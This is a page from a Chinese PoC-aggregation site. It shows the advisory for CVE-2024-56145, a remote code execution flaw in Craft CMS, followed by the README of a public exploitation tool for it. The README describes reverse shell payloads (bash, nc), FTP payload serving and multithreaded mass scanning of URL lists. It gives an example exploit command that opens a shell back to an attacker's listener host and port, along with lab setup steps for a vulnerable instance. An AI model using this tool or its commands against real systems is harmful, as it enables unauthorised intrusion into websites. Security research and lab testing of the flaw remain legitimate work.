关联漏洞
标题:
Craft CMS 代码注入漏洞
(CVE-2024-56145)
描述:Craft CMS是Craft CMS开源的一套内容管理系统(CMS)。 Craft CMS 5.0.0-RC1版本至5.5.2之前版本和4.0.0-RC版本至4.13.2之前版本存在代码注入漏洞,该漏洞源于php.ini配置的register_argc_argv选项被启用时,会出现未指定的远程代码执行向量。
描述
Unauthenticated RCE on CraftCMS when PHP `register_argc_argv` config setting is enabled
介绍
# CVE-2024-56145: Craft CMS Exploitation Tool 🚨
This tool is designed to exploit a vulnerability in **Craft CMS** identified by the amazing research team at [Assetnote](https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms). The issue arises due to improper handling of user-supplied template paths, allowing attackers to achieve **Remote Code Execution (RCE)** 🛠️ via specially crafted payloads.
🙏 **Special thanks to Assetnote for their dedication to security and research.**
---
## ✨ Features
- 🚀 **Automated FTP server** to serve malicious payloads.
- 🧪 **Reverse shell payload generation** with multiple options (`bash`, `nc`).
- 🔍 **Vulnerability checker** to identify vulnerable targets.
- 🖥️ **Multithreaded support** for faster scans.
- 🛠️ **Easy-to-use CLI interface** with clear feedback.
---
## 🛡️ Setting Up a Vulnerable Lab
Follow these steps to set up a Craft CMS instance for testing purposes:
```bash
mkdir exploit-craft && \
cd exploit-craft && \
# Configure DDEV project for Craft CMS
ddev config \
--project-type=craftcms \
--docroot=web \
--create-docroot \
--php-version="8.2" \
--database="mysql:8.0" \
--nodejs-version="20" && \
# Create the DDEV project
ddev start -y && \
# Create Craft CMS with the specified version
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
# Install the specific CMS version
ddev composer require "craftcms/cms:5.5.0" \
--no-scripts \
--no-interaction --with-all-dependencies && \
# Set the security key for Craft CMS
ddev craft setup/security-key && \
# Install Craft CMS
ddev craft install/craft \
--username=admin \
--password=password123 \
--email=admin@example.com \
--site-name=Testsite \
--language=en \
--site-url='$DDEV_PRIMARY_URL' && \
# Enable register_argc_argv for PHP
mkdir -p .ddev/php/ && \
echo "register_argc_argv = On" > .ddev/php/php.ini && \
# Final step, echo message and launch the project
echo 'Nice, ready to launch!' && \
ddev launch
```
---
## 🚨 Usage
Run the tool with the `--help` flag to view available commands:
```bash
python exploit.py --help
```
---
### 🚀 Exploit Command
To exploit a target:
```bash
python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>
```
#### ⚙️ Options:
- `-u` / `--url`: The target URL (required).
- `-lh` / `--lhost`: Your local IP for receiving the reverse shell (required).
- `-lp` / `--lport`: The local port for the listener (required).
- `-px` / `--payload`: Payload type (`bash`, `nc`). Default: `bash`.
#### 🧪 Example:
```bash
python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash
```
---
### 🔍 Check Command
To check if a target is vulnerable:
```bash
python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>
```
#### ⚙️ Options:
- `-u` / `--url`: A single target URL.
- `-f` / `--file`: A file containing multiple URLs to scan.
- `-t` / `--threads`: Number of concurrent threads for scanning.
- `-o` / `--output`: Output file to save results.
#### 🧪 Example:
```bash
python exploit.py check -f urls.txt -t 10 -o results.txt
```
Enjoy responsibly and ethically! ✨
文件快照
[4.0K] /data/pocs/837ef8197195b3656da48a7ef85905c69dacdae6
├── [7.5K] exploit.py
├── [4.0K] img
│ ├── [ 33K] check.png
│ ├── [368K] exploit.png
│ └── [ 63K] help.png
├── [3.3K] README.md
└── [ 60] requirements.txt
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。